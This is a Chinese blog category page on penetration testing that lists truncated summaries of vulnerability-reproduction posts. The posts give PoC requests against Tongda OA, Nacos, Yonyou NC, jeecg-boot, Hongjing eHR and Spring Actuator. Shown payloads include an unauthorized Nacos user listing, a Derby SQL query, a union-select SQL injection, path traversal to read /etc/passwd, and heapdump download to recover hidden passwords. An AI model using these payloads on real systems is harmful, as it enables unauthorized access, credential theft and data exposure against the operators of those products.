随笔分类 -  渗透测试

摘要:漏洞复现: POC: POST /ispirit/interface/login.php HTTP/1.1 Host: ip Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows 阅读全文
posted @ 2025-07-31 14:00 都吃泡芙 阅读(90) 评论(0) 推荐(0)
摘要:影响范围: Nacos <= 2.0.0-ALPHA.1 漏洞复现: 检测漏洞是否存在 POC: /nacos/v1/auth/users?pageNo=1&pageSize=4 接下来可以尝试创建用户,useragent写成Nacos-Server POC: POST /nacos/v1/auth 阅读全文
posted @ 2024-07-01 09:17 都吃泡芙 阅读(886) 评论(0) 推荐(0)
摘要:影响范围: 0.1.0 <= Nacos <= 2.2.0 漏洞复现: POC: POST /nacos/v1/auth/users/login HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; r 阅读全文
posted @ 2024-06-28 15:29 都吃泡芙 阅读(207) 评论(0) 推荐(1)
摘要:漏洞复现: POC: /nacos/v1/cs/ops/derby?sql=select%20%2a%20from%20users 阅读全文
posted @ 2024-06-27 19:32 都吃泡芙 阅读(876) 评论(0) 推荐(0)
摘要:漏洞复现: 首先上传jsp POC: POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, l 阅读全文
posted @ 2024-06-26 16:45 都吃泡芙 阅读(312) 评论(0) 推荐(0)
摘要:漏洞复现: POC: /uapws/index.jsp 阅读全文
posted @ 2024-06-26 16:30 都吃泡芙 阅读(161) 评论(0) 推荐(0)
摘要:漏洞复现: POC: /uapws/service 阅读全文
posted @ 2024-06-26 16:28 都吃泡芙 阅读(121) 评论(0) 推荐(0)
摘要:漏洞复现: POC: /uapws/service/nc.uap.oba.update.IUpdateService?wsdl 阅读全文
posted @ 2024-06-26 16:26 都吃泡芙 阅读(254) 评论(0) 推荐(0)
摘要:漏洞复现: POC: POST /uapws/soapFormat.ajax HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 阅读全文
posted @ 2024-06-26 16:21 都吃泡芙 阅读(223) 评论(0) 推荐(0)
摘要:影响范围: 3.0.0 <= jeecg-boot <= 3.5.3 2.4.x <= jeecg-boot <= 2.4.6 POC: POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1 Host: ip Pragma: no-cache Cach 阅读全文
posted @ 2024-06-22 14:07 都吃泡芙 阅读(969) 评论(0) 推荐(1)
摘要:漏洞复现: POC: POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/ 阅读全文
posted @ 2024-06-14 16:23 都吃泡芙 阅读(180) 评论(0) 推荐(0)
摘要:漏洞复现: poc: POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW 阅读全文
posted @ 2024-06-13 14:33 都吃泡芙 阅读(237) 评论(0) 推荐(0)
摘要:漏洞复现: 1、读取/etc/passwd http:url/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP 其中path字段加密通过下面工具来实现 工具地址:https://github. 阅读全文
posted @ 2024-06-12 09:22 都吃泡芙 阅读(305) 评论(0) 推荐(0)
摘要:适用范围:宏景eHR < 8.2 登录页面 查询cusername: /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2 阅读全文
posted @ 2024-06-06 18:02 都吃泡芙 阅读(92) 评论(0) 推荐(0)
摘要:一、查看加密星号信息(适用于数据库密码、ftp、ssh) 1.首先访问地址:http://url/actuator/env 出现一些配置信息,搜索带有****** 可以看到ftp的ip,username,password 2.接着访问http://url/actuator/heapdump 下载下来 阅读全文
posted @ 2024-06-06 11:38 都吃泡芙 阅读(616) 评论(2) 推荐(1)

//雪花飘落效果 //雪花飘落效果